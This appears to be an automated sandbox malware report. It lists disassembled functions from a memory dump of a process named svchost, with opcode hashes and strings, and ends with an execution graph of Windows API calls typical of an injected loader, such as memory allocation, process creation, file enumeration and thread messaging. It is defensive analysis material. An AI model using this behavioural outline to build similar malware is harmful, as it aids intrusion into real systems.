                                            Function 03A72CA0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f6bbe34faf38423a2af5c2874f69607b4429775ac7edf08cb935ebffec54d0f0
                                            • Instruction ID: 806b039d6371e4f527156db2afec7b665d7abe141e3f5d8ac3d59411953d7dfb
                                            • Opcode Fuzzy Hash: f6bbe34faf38423a2af5c2874f69607b4429775ac7edf08cb935ebffec54d0f0
                                            • Instruction Fuzzy Hash: 9C90023120140802D100B6985448686400A87E0301F96D012A5024559ECB6989916131
                                            Function 03A72CF0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 07a98a7412d0fe01d53a863fbbd752a3e3e2cc27cdaa43e0ae0223f92ba8f990
                                            • Instruction ID: 91d7a4e47c06e320ca148faec19256fb603671885ea1973d301cb26e87b3080e
                                            • Opcode Fuzzy Hash: 07a98a7412d0fe01d53a863fbbd752a3e3e2cc27cdaa43e0ae0223f92ba8f990
                                            • Instruction Fuzzy Hash: A390023120140803D100B2585548747400A87D0301F96D412A042455CDDB5A89516131
                                            Function 03A72CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fd0cd61c70e95480d2a22868317c37e6d12c7c3576a11faf8e072a87fbaa05e0
                                            • Instruction ID: 6c875257121a20332aef1164de5238a92b1e09c82d1a6603dc0ec3062c1801e7
                                            • Opcode Fuzzy Hash: fd0cd61c70e95480d2a22868317c37e6d12c7c3576a11faf8e072a87fbaa05e0
                                            • Instruction Fuzzy Hash: 2090022160540802D140B2585458746401A87D0301F96D012A0024558DCB5D8B5566B1
                                            Function 03A72C60 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ba9005bb96f146622660bdcdccae020250d42037b06e37970c204efd3a20bee6
                                            • Instruction ID: cf8172b1e8da8ad95efb9db8a736e593390540e95d237bffdc2c3e332be5f8f9
                                            • Opcode Fuzzy Hash: ba9005bb96f146622660bdcdccae020250d42037b06e37970c204efd3a20bee6
                                            • Instruction Fuzzy Hash: 1490023120140C42D100B2584444B86400A87E0301F96C017A0124658D8B19C9517531
                                            Function 03A72C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction ID: 753309e0dc3e3b2c57bf69f5c6ba90d10068aba477833187e49ad9ddd6b483c7
                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction Fuzzy Hash:
                                            Function 03A72890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: efdb772acde483bd6861764ebe7ee4a00185b0615d695e62262ad3eeb6309758
                                            • Instruction ID: ec548c573cde0ac30e1b9fc2c60b262bfd6e5c1b0492a2015831f35271c54223
                                            • Opcode Fuzzy Hash: efdb772acde483bd6861764ebe7ee4a00185b0615d695e62262ad3eeb6309758
                                            • Instruction Fuzzy Hash: 9451B6B6A04616BFCB10DB9C8DD0A7EF7F8BB09200B18856BE4A5D7641D334DE44CBA0
                                            Function 03A67630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                            Download Yara Rule
                                            Strings
                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03AA4725
                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 03AA4787
                                            • ExecuteOptions, xrefs: 03AA46A0
                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03AA4655
                                            • Execute=1, xrefs: 03AA4713
                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03AA4742
                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03AA46FC
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                            • API String ID: 0-484625025
                                            • Opcode ID: 7620e91770c2155ed5f3670237c5494f1820e3e3002a7780dea0961e5db58653
                                            • Instruction ID: d804800f09c69c4131d25540a1b71c262a40e26422fdb78533fe97d5d351d51e
                                            • Opcode Fuzzy Hash: 7620e91770c2155ed5f3670237c5494f1820e3e3002a7780dea0961e5db58653
                                            • Instruction Fuzzy Hash: E0511B396103197EDF10EB69DD85FAE73BCEF09308F0801ABE505AB291E7769A418F50
                                            Function 03A7B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-$0$0
                                            • API String ID: 1302938615-699404926
                                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                            • Instruction ID: 692d9c299c65e652c387dedeb3a643475e05cd2aeb33f94cf9d3aef3ba7e780e
                                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                            • Instruction Fuzzy Hash: 96816BB4E062499EDF24CF68CCD17EEBBB6AF46250F1C425FD861AB391C63499408B70
                                            Function 03A5F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                            Download Yara Rule
                                            Strings
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03AA02BD
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03AA02E7
                                            • RTL: Re-Waiting, xrefs: 03AA031E
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                            • API String ID: 0-2474120054
                                            • Opcode ID: 8171a73a522a2e2ae02657b52d39fa63da7ae1955ecb5dc9dfb5641cec53ac31
                                            • Instruction ID: a829cdd8fd70b01a40f07c48e17ebcbf59ac56834db0bff96b6692793dc9fac0
                                            • Opcode Fuzzy Hash: 8171a73a522a2e2ae02657b52d39fa63da7ae1955ecb5dc9dfb5641cec53ac31
                                            • Instruction Fuzzy Hash: 57E1CC31608B41DFD724CF28C984B2AB7E4BF89314F180A6EF9A58B6E1D774D944CB52
                                            Function 03A6BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                            Download Yara Rule
                                            Strings
                                            • RTL: Resource at %p, xrefs: 03AA7B8E
                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03AA7B7F
                                            • RTL: Re-Waiting, xrefs: 03AA7BAC
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 0-871070163
                                            • Opcode ID: 61908beaef8b2c082e8c6ead0c6af44ea67c14cd38f2fc56d018a4c2fc5bec77
                                            • Instruction ID: 9c081307b8ba9ad594f599379f55e6de82f50171cc0e9ed5beb7c738b348f49c
                                            • Opcode Fuzzy Hash: 61908beaef8b2c082e8c6ead0c6af44ea67c14cd38f2fc56d018a4c2fc5bec77
                                            • Instruction Fuzzy Hash: D541B2367007029FC724DF69CD40B6AB7E9EB89710F140A2EE956DB690DB71E4058BA1
                                            Function 03A6B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                            Download Yara Rule
                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03AA728C
                                            Strings
                                            • RTL: Resource at %p, xrefs: 03AA72A3
                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03AA7294
                                            • RTL: Re-Waiting, xrefs: 03AA72C1
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 885266447-605551621
                                            • Opcode ID: dd123cc5c18aee18e19779f90ea561fd81ed4fff567570b827424dcb1576b59f
                                            • Instruction ID: 0a863f17a1bc196f58818d7adb1a92f36501d85c610dbd7bd0b90e1c26c2093c
                                            • Opcode Fuzzy Hash: dd123cc5c18aee18e19779f90ea561fd81ed4fff567570b827424dcb1576b59f
                                            • Instruction Fuzzy Hash: 2B41E136600706AFC724DF69CC41B6AB7A9FB94710F140A2FF855DB240DB31E81687E1
                                            Function 03A77D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-
                                            • API String ID: 1302938615-2137968064
                                            • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                            • Instruction ID: eac62f73c55acd8fb255fd76053b445bae2821f540de45e3cc07a6c78ae7ed7e
                                            • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                            • Instruction Fuzzy Hash: 3E91A071E002169EDB24DF69CDC1ABEB7B9AF44320F58462FE865E72C0D7368942CB50
                                            Function 03A39126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$@
                                            • API String ID: 0-1194432280
                                            • Opcode ID: 63a5f381fc25654856b3000758802225db1f937adccef64e4812b2e7955b3615
                                            • Instruction ID: 2827f768d20e42e7bebd5ce388238204eb0253c011ccd7e41c5e8bbc1d3255ab
                                            • Opcode Fuzzy Hash: 63a5f381fc25654856b3000758802225db1f937adccef64e4812b2e7955b3615
                                            • Instruction Fuzzy Hash: 55813A76D002699BDB31DF54CD44BEAB7B8AB48710F0445EBA90DB7680E7709E84CFA0

                                            Execution Graph

                                            Execution Coverage:3.1%
                                            Dynamic/Decrypted Code Coverage:4%
                                            Signature Coverage:2.1%
                                            Total number of Nodes:471
                                            Total number of Limit Nodes:77
                                            execution_graph 78887 419480 78890 41995a 78887->78890 78888 419e57 78890->78888 78891 439700 78890->78891 78892 439726 78891->78892 78897 413e80 78892->78897 78894 439732 78895 439760 78894->78895 78900 434250 78894->78900 78895->78888 78904 422de0 78897->78904 78899 413e8d 78899->78894 78901 4342aa 78900->78901 78903 4342b7 78901->78903 78928 4212c0 78901->78928 78903->78895 78905 422df7 78904->78905 78907 422e0d 78905->78907 78908 438610 78905->78908 78907->78899 78909 438628 78908->78909 78910 43864c 78909->78910 78915 437290 78909->78915 78910->78907 78916 4372ad 78915->78916 78922 2e52c0a 78916->78922 78917 4372d9 78919 439a70 78917->78919 78925 437f30 78919->78925 78921 4386b4 78921->78907 78923 2e52c11 78922->78923 78924 2e52c1f LdrInitializeThunk 78922->78924 78923->78917 78924->78917 78926 437f4d 78925->78926 78927 437f5e RtlFreeHeap 78926->78927 78927->78921 78929 4212fb 78928->78929 78944 427510 78929->78944 78931 421303 78932 4215c5 78931->78932 78955 439b50 78931->78955 78932->78903 78934 421319 78935 439b50 RtlAllocateHeap 78934->78935 78936 42132a 78935->78936 78937 439b50 RtlAllocateHeap 78936->78937 78939 42133b 78937->78939 78943 4213ce 78939->78943 78966 426310 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 78939->78966 78941 421582 78962 436970 78941->78962 78958 4240a0 78943->78958 78945 42753c 78944->78945 78967 427400 78945->78967 78948 427581 78952 437be0 NtClose 78948->78952 78953 42759d 78948->78953 78949 427569 78950 427574 78949->78950 78973 437be0 78949->78973 78950->78931 78954 427593 78952->78954 78953->78931 78954->78931 78981 437ee0 78955->78981 78957 439b68 78957->78934 78959 4240c4 78958->78959 78960 4240cb 78959->78960 78961 424110 LdrLoadDll 78959->78961 78960->78941 78961->78960 78963 4369ca 78962->78963 78965 4369d7 78963->78965 78984 4215e0 78963->78984 78965->78932 78966->78943 78968 42741a 78967->78968 78972 4274f6 78967->78972 78976 437330 78968->78976 78971 437be0 NtClose 78971->78972 78972->78948 78972->78949 78974 437bfd 78973->78974 78975 437c0e NtClose 78974->78975 78975->78950 78977 43734d 78976->78977 78980 2e535c0 LdrInitializeThunk 78977->78980 78978 4274ea 78978->78971 78980->78978 78982 437efd 78981->78982 78983 437f0e RtlAllocateHeap 78982->78983 78983->78957 78987 421600 78984->78987 79000 4277e0 78984->79000 78986 421ae5 78986->78965 78987->78986 79004 430420 78987->79004 78990 4217fe 79013 43ac80 78990->79013 78992 42165b 78992->78986 79008 43ab50 78992->79008 78994 421813 78996 42183e 78994->78996 79019 420280 78994->79019 78996->78986 78997 420280 LdrInitializeThunk 78996->78997 79022 427780 78996->79022 78997->78996 78998 427780 LdrInitializeThunk 78999 42196c 78998->78999 78999->78996 78999->78998 79001 4277ed 79000->79001 79002 427815 79001->79002 79003 42780e SetErrorMode 79001->79003 79002->78987 79003->79002 79005 430439 79004->79005 79026 4399e0 79005->79026 79007 430441 79007->78992 79009 43ab60 79008->79009 79010 43ab66 79008->79010 79009->78990 79011 439b50 RtlAllocateHeap 79010->79011 79012 43ab8c 79011->79012 79012->78990 79014 43abf0 79013->79014 79015 439b50 RtlAllocateHeap 79014->79015 79016 43ac4d 79014->79016 79017 43ac2a 79015->79017 79016->78994 79018 439a70 RtlFreeHeap 79017->79018 79018->79016 79020 4202a2 79019->79020 79033 437e40 79019->79033 79020->78999 79023 427793 79022->79023 79038 4371a0 79023->79038 79025 4277be 79025->78996 79029 437d30 79026->79029 79028 439a11 79028->79007 79030 437db1 79029->79030 79032 437d51 79029->79032 79031 437dc7 NtAllocateVirtualMemory 79030->79031 79031->79028 79032->79028 79034 437e5a 79033->79034 79037 2e52c70 LdrInitializeThunk 79034->79037 79035 437e82 79035->79020 79037->79035 79039 43720a 79038->79039 79041 4371c1 79038->79041 79043 2e52dd0 LdrInitializeThunk 79039->79043 79040 43722f 79040->79025 79041->79025 79043->79040 79044 420700 79045 420719 79044->79045 79046 4240a0 LdrLoadDll 79045->79046 79047 420737 79046->79047 79048 420783 79047->79048 79049 420770 PostThreadMessageW 79047->79049 79049->79048 79050 42eb80 79051 42ebe4 79050->79051 79081 425bb0 79051->79081 79053 42ed14 79054 42ed0d 79054->79053 79088 425cc0 79054->79088 79057 42eeb3 79059 42edad 79060 42eec2 79059->79060 79097 42e960 79059->79097 79061 437be0 NtClose 79060->79061 79064 42eecc 79061->79064 79063 42edc5 79063->79060 79065 42edd0 79063->79065 79066 439b50 RtlAllocateHeap 79065->79066 79067 42edf9 79066->79067 79068 42ee02 79067->79068 79069 42ee18 79067->79069 79070 437be0 NtClose 79068->79070 79106 42e850 CoInitialize 79069->79106 79072 42ee0c 79070->79072 79073 42ee26 79108 4376f0 79073->79108 79075 42eea2 79076 437be0 NtClose 79075->79076 79077 42eeac 79076->79077 79078 439a70 RtlFreeHeap 79077->79078 79078->79057 79079 42ee44 79079->79075 79080 4376f0 LdrInitializeThunk 79079->79080 79080->79079 79082 425be3 79081->79082 79083 425c07 79082->79083 79112 437790 79082->79112 79083->79054 79085 425c2a 79085->79083 79086 437be0 NtClose 79085->79086 79087 425cac 79086->79087 79087->79054 79089 425ce5 79088->79089 79117 437580 79089->79117 79092 4359a0 79094 4359fd 79092->79094 79093 435a30 79093->79059 79094->79093 79122 42f751 RtlFreeHeap 79094->79122 79096 435a12 79096->79059 79098 42e97c 79097->79098 79099 4240a0 LdrLoadDll 79098->79099 79101 42e99a 79099->79101 79100 42e9a3 79100->79063 79101->79100 79102 4240a0 LdrLoadDll 79101->79102 79103 42ea6e 79102->79103 79104 4240a0 LdrLoadDll 79103->79104 79105 42eacb 79103->79105 79104->79105 79105->79063 79107 42e8b5 79106->79107 79107->79073 79109 43770a 79108->79109 79123 2e52ba0 LdrInitializeThunk 79109->79123 79110 43773a 79110->79079 79113 4377aa 79112->79113 79116 2e52ca0 LdrInitializeThunk 79113->79116 79114 4377d6 79114->79085 79116->79114 79118 43759d 79117->79118 79121 2e52c60 LdrInitializeThunk 79118->79121 79119 425d59 79119->79057 79119->79092 79121->79119 79122->79096 79123->79110 79124 437240 79125 43725d 79124->79125 79128 2e52df0 LdrInitializeThunk 79125->79128 79126 437285 79128->79126 79141 4253c4 79142 42535b 79141->79142 79143 4253ce 79141->79143 79147 427780 LdrInitializeThunk 79142->79147 79149 425370 79142->79149 79144 437290 LdrInitializeThunk 79143->79144 79145 425406 79144->79145 79159 437c70 79145->79159 79147->79149 79148 42541b 79151 42539c 79149->79151 79152 427700 79149->79152 79153 427744 79152->79153 79154 427765 79153->79154 79164 436fa0 79153->79164 79154->79149 79156 427755 79157 427771 79156->79157 79158 437be0 NtClose 79156->79158 79157->79149 79158->79154 79160 437ceb 79159->79160 79162 437c91 79159->79162 79170 2e52e80 LdrInitializeThunk 79160->79170 79161 437d1c 79161->79148 79162->79148 79165 43700c 79164->79165 79167 436fc4 79164->79167 79169 2e54650 LdrInitializeThunk 79165->79169 79166 437031 79166->79156 79167->79156 79169->79166 79170->79161 79171 4253d0 79172 425406 79171->79172 79173 437290 LdrInitializeThunk 79171->79173 79174 437c70 LdrInitializeThunk 79172->79174 79173->79172 79175 42541b 79174->79175 79176 430a50 79177 430a6c 79176->79177 79178 430a94 79177->79178 79179 430aa8 79177->79179 79180 437be0 NtClose 79178->79180 79181 437be0 NtClose 79179->79181 79182 430a9d 79180->79182 79183 430ab1 79181->79183 79186 439b90 RtlAllocateHeap 79183->79186 79185 430abc 79186->79185 79187 434410 79188 43446a 79187->79188 79190 434477 79188->79190 79191 426c80 79188->79191 79192 426c37 79191->79192 79193 426c72 79192->79193 79195 42a810 79192->79195 79193->79190 79196 42a836 79195->79196 79197 42aa55 79196->79197 79222 437fc0 79196->79222 79197->79193 79199 42a8ac 79199->79197 79200 43ac80 2 API calls 79199->79200 79201 42a8c8 79200->79201 79201->79197 79202 42a999 79201->79202 79203 437290 LdrInitializeThunk 79201->79203 79204 4252c0 LdrInitializeThunk 79202->79204 79206 42a9b8 79202->79206 79205 42a924 79203->79205 79204->79206 79205->79202 79209 42a92d 79205->79209 79210 42aa3d 79206->79210 79229 436e60 79206->79229 79207 42a981 79211 427780 LdrInitializeThunk 79207->79211 79208 42a95f 79244 433460 LdrInitializeThunk 79208->79244 79209->79197 79209->79207 79209->79208 79225 4252c0 79209->79225 79216 427780 LdrInitializeThunk 79210->79216 79215 42a98f 79211->79215 79215->79193 79218 42aa4b 79216->79218 79217 42aa14 79234 436f00 79217->79234 79218->79193 79220 42aa2e 79239 437040 79220->79239 79223 437fdd 79222->79223 79224 437fee CreateProcessInternalW 79223->79224 79224->79199 79226 4252cb 79225->79226 79245 437450 79226->79245 79228 4252fe 79228->79208 79230 436ecc 79229->79230 79232 436e84 79229->79232 79251 2e539b0 LdrInitializeThunk 79230->79251 79231 436ef1 79231->79217 79232->79217 79235 436f69 79234->79235 79237 436f21 79234->79237 79252 2e54340 LdrInitializeThunk 79235->79252 79236 436f8e 79236->79220 79237->79220 79240 4370ac 79239->79240 79241 437064 79239->79241 79253 2e52fb0 LdrInitializeThunk 79240->79253 79241->79210 79242 4370d1 79242->79210 79244->79207 79246 4374ec 79245->79246 79247 437474 79245->79247 79250 2e52d10 LdrInitializeThunk 79246->79250 79247->79228 79248 437531 79248->79228 79250->79248 79251->79231 79252->79236 79253->79242 79254 434c10 79255 434c6a 79254->79255 79256 434c77 79255->79256 79258 4327b0 79255->79258 79259 4399e0 NtAllocateVirtualMemory 79258->79259 79261 4327f1 79259->79261 79260 4328f6 79260->79256 79261->79260 79262 4240a0 LdrLoadDll 79261->79262 79264 432837 79262->79264 79263 432870 Sleep 79263->79264 79264->79260 79264->79263 79270 437b50 79271 437bb6 79270->79271 79273 437b74 79270->79273 79272 437bcc NtDeleteFile 79271->79272 79275 4266da 79276 42669f 79275->79276 79279 4266de 79275->79279 79280 4275b0 79276->79280 79278 4266b4 79281 4275cd 79280->79281 79287 437380 79281->79287 79283 42761d 79284 427624 79283->79284 79285 437450 LdrInitializeThunk 79283->79285 79284->79278 79286 42764d 79285->79286 79286->79278 79288 437407 79287->79288 79290 4373a1 79287->79290 79292 2e52f30 LdrInitializeThunk 79288->79292 79289 437440 79289->79283 79290->79283 79292->79289 79293 43051a 79294 43050e 79293->79294 79294->79293 79299 4305ca 79294->79299 79302 430602 79294->79302 79307 437a70 79294->79307 79295 430620 79297 437be0 NtClose 79295->79297 79296 430635 79298 437be0 NtClose 79296->79298 79301 430629 79297->79301 79304 43063e 79298->79304 79302->79295 79302->79296 79303 43066a 79304->79303 79305 439a70 RtlFreeHeap 79304->79305 79306 43065e 79305->79306 79308 437b06 79307->79308 79310 437a94 79307->79310 79309 437b1c NtReadFile 79308->79309 79309->79302 79310->79302 79311 42231b 79312 42237b 79311->79312 79314 422320 79311->79314 79313 425bb0 2 API calls 79312->79313 79316 4223a0 79312->79316 79313->79316 79315 4240a0 LdrLoadDll 79314->79315 79315->79312 79317 419420 79318 41942f 79317->79318 79319 419470 79318->79319 79320 41945d CreateThread 79318->79320 79321 41b0e0 79322 4399e0 NtAllocateVirtualMemory 79321->79322 79323 41c751 79321->79323 79322->79323 79324 42f460 79325 42f47d 79324->79325 79326 4240a0 LdrLoadDll 79325->79326 79327 42f49b 79326->79327 79328 4359a0 RtlFreeHeap 79327->79328 79329 42f61a 79327->79329 79328->79329 79330 42a320 79335 42a050 79330->79335 79332 42a32d 79349 429cf0 79332->79349 79334 42a343 79336 42a075 79335->79336 79360 4279d0 79336->79360 79339 42a1b2 79339->79332 79341 42a1c9 79341->79332 79342 42a1c0 79342->79341 79344 42a2b1 79342->79344 79375 429750 79342->79375 79346 42a309 79344->79346 79384 429ab0 79344->79384 79347 439a70 RtlFreeHeap 79346->79347 79348 42a310 79347->79348 79348->79332 79350 429d06 79349->79350 79358 429d11 79349->79358 79351 439b50 RtlAllocateHeap 79350->79351 79351->79358 79352 429d27 79352->79334 79353 4279d0 GetFileAttributesW 79353->79358 79354 42a01e 79355 42a037 79354->79355 79356 439a70 RtlFreeHeap 79354->79356 79355->79334 79356->79355 79357 429750 RtlFreeHeap 79357->79358 79358->79352 79358->79353 79358->79354 79358->79357 79359 429ab0 RtlFreeHeap 79358->79359 79359->79358 79361 4279f1 79360->79361 79362 4279f8 GetFileAttributesW 79361->79362 79363 427a03 79361->79363 79362->79363 79363->79339 79364 4320a0 79363->79364 79365 4320ae 79364->79365 79366 4320b5 79364->79366 79365->79342 79367 4240a0 LdrLoadDll 79366->79367 79368 4320ea 79367->79368 79369 4320f9 79368->79369 79388 431b70 LdrLoadDll 79368->79388 79371 439b50 RtlAllocateHeap 79369->79371 79374 432294 79369->79374 79373 432112 79371->79373 79372 439a70 RtlFreeHeap 79372->79374 79373->79372 79373->79374 79374->79342 79376 429776 79375->79376 79389 42cf70 79376->79389 79378 4297dd 79380 42995f 79378->79380 79382 4297fb 79378->79382 79379 429944 79379->79342 79380->79379 79381 429610 RtlFreeHeap 79380->79381 79381->79380 79382->79379 79394 429610 79382->79394 79385 429ad6 79384->79385 79386 42cf70 RtlFreeHeap 79385->79386 79387 429b52 79386->79387 79387->79344 79388->79369 79391 42cf80 79389->79391 79390 42cf90 79390->79378 79391->79390 79392 439a70 RtlFreeHeap 79391->79392 79393 42cfc9 79392->79393 79393->79378 79395 429626 79394->79395 79398 42cfe0 79395->79398 79397 42972c 79397->79382 79399 42d004 79398->79399 79400 42d09c 79399->79400 79401 439a70 RtlFreeHeap 79399->79401 79400->79397 79401->79400 79402 4370e0 79403 43715b 79402->79403 79405 437101 79402->79405 79407 2e52ee0 LdrInitializeThunk 79403->79407 79404 43718c 79407->79404 79408 437920 79409 4379bf 79408->79409 79411 437941 79408->79411 79410 4379d5 NtCreateFile 79409->79410 79412 430de0 79416 430def 79412->79416 79413 430e33 79414 439a70 RtlFreeHeap 79413->79414 79415 430e43 79414->79415 79416->79413 79417 430e71 79416->79417 79419 430e76 79416->79419 79418 439a70 RtlFreeHeap 79417->79418 79418->79419 79420 422cec 79421 427400 2 API calls 79420->79421 79423 422cfc 79421->79423 79422 422d11 79423->79422 79424 437be0 NtClose 79423->79424 79424->79422 79425 426a30 79426 426a4c 79425->79426 79434 426a9f 79425->79434 79428 437be0 NtClose 79426->79428 79426->79434 79427 426bc8 79429 426a67 79428->79429 79435 425e40 NtClose LdrInitializeThunk LdrInitializeThunk 79429->79435 79431 426ba2 79431->79427 79437 426010 NtClose LdrInitializeThunk LdrInitializeThunk 79431->79437 79434->79427 79436 425e40 NtClose LdrInitializeThunk LdrInitializeThunk 79434->79436 79435->79434 79436->79431 79437->79427 79438 42bab0 79440 42bad9 79438->79440 79439 42bbdd 79440->79439 79441 42bb83 FindFirstFileW 79440->79441 79441->79439 79443 42bb9e 79441->79443 79442 42bbc4 FindNextFileW 79442->79443 79444 42bbd6 FindClose 79442->79444 79443->79442 79444->79439 79445 435870 79446 4358cd 79445->79446 79447 4358f8 79446->79447 79450 42fd80 79446->79450 79449 4358da 79452 42fb40 79450->79452 79451 42fd70 79451->79449 79452->79451 79453 425cc0 LdrInitializeThunk 79452->79453 79454 437be0 NtClose 79452->79454 79455 4376f0 LdrInitializeThunk 79452->79455 79453->79452 79454->79452 79455->79452 79456 427e31 